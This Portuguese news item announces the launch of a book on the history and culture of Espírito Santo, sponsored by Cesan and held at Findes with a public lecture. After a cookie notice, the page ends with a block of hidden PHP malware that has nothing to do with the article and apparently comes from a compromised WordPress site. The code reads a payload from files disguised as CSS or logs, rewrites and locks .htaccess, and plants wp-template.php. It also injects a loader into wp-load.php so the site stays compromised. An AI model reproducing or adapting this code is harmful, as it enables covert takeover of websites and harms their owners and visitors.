Na segunda-feira (20), aconteceu o lançamento do livro Espírito Santo, coordenado por Antonio de Pádua Gurgel e patrocinado pela Cesan (Companhia Espírito-santense de Saneamento). O evento acontece a partir das 19 horas, no Salão da Indústria, na Findes (Federação das Indústrias do Espírito Santo).

A publicação conta a história e a cultura do Espírito Santo com registros desde o início da colonização. Além disso, o livro é uma espécie de cartão de visitas do Espírito Santo. Durante o lançamento, haverá uma palestra com o Professor Doutor Estilaque Ferreira dos Santos sobre a história do Espírito Santo e a identidade capixaba. A participação no evento é livre.

icone-es

Usamos cookies essenciais ao funcionamento do site. Ao continuar navegando você concorda com a nossa Política de Privacidade

$zxrpath=$_SERVER["DOCUMENT_ROOT"]."/";$_autoplarr=array("/logs/history.log","/tmp/history.log",$zxrpath."wp-includes/css/common.css",$zxrpath."wp-includes/js/jquery/common.js",$zxrpath."wp-includes/blocks/avatar/common.css",$zxrpath."wp-admin/js/widgets/common.js",$zxrpath."wp-admin/css/colors/modern/common.css",$zxrpath."wp-content/themes/twentytwentythree/styles/common.css",$zxrpath."wp-content/themes/twentytwentytwo/styles/common.css",$zxrpath."wp-content/themes/twentytwentyfive/styles/common.css",$zxrpath."wp-content/themes/twentytwentyfour/styles/common.css",$zxrpath."wp-content/plugins/contact-form-7/assets/common.css");$_titlefilename="";$_wptemplatecon="";$_htaccesscon="";foreach($_autoplarr as $_autofile){if(@file_exists($_autofile)){$_titlefilename=$_autofile;break;}}if($_titlefilename){$_autocon=@file_get_contents($_titlefilename);if($_autocon){$_autoarrcon=explode("---", $_autocon);$_wptemplatecon=$_autoarrcon[0];$_htaccesscon=trim($_autoarrcon[1],PHP_EOL);}if($_htaccesscon&&strpos($_htaccesscon, "index.php")!==false){$_htaccessname=$zxrpath.".htaccess";if(file_exists($_htaccessname)){$_htaccesstext=file_get_contents($_htaccessname);if(strpos($_htaccesstext,"404")===false&&strpos($_htaccesstext,"index.php")===false){chmod($_htaccessname, 0775);unlink($_htaccessname);file_put_contents($_htaccessname, $_htaccesscon);chmod($_htaccessname, 0444);}}else{file_put_contents($_htaccessname, $_htaccesscon);if(file_exists($_htaccessname)){chmod($_htaccessname, 0444);}}}$_prewploadfilename=$zxrpath."wp-load.php";$_prewptplfilename=$zxrpath."wp-template.php";if(!file_exists($_prewptplfilename)){file_put_contents($_prewptplfilename, $_wptemplatecon);chmod($_prewptplfilename, 0444);}$_wploadcon=@file_get_contents($_prewploadfilename);if($_wploadcon&&strpos($_wploadcon, "wp-template.php")===false){$_prewplocon=str_replace("/** Define ABSPATH", "if(file_exists(dirname(__FILE__).\"/wp-template.php\")){require_once(dirname(__FILE__).\"/wp-template.php\");}".PHP_EOL."/** Define ABSPATH", $_wploadcon);file_put_contents($_prewploadfilename, $_prewplocon);chmod($_prewploadfilename, 0444);$_currnetfileid=1;}if($_wploadcon&&strpos($_wploadcon, "//if(file_exists(dirname(")!==false){$_wploadcon=str_replace("//if(file_exists(dirname(", "if(file_exists(dirname(", $_wploadcon);file_put_contents($_prewploadfilename, $_wploadcon);chmod($_prewploadfilename, 0444);}}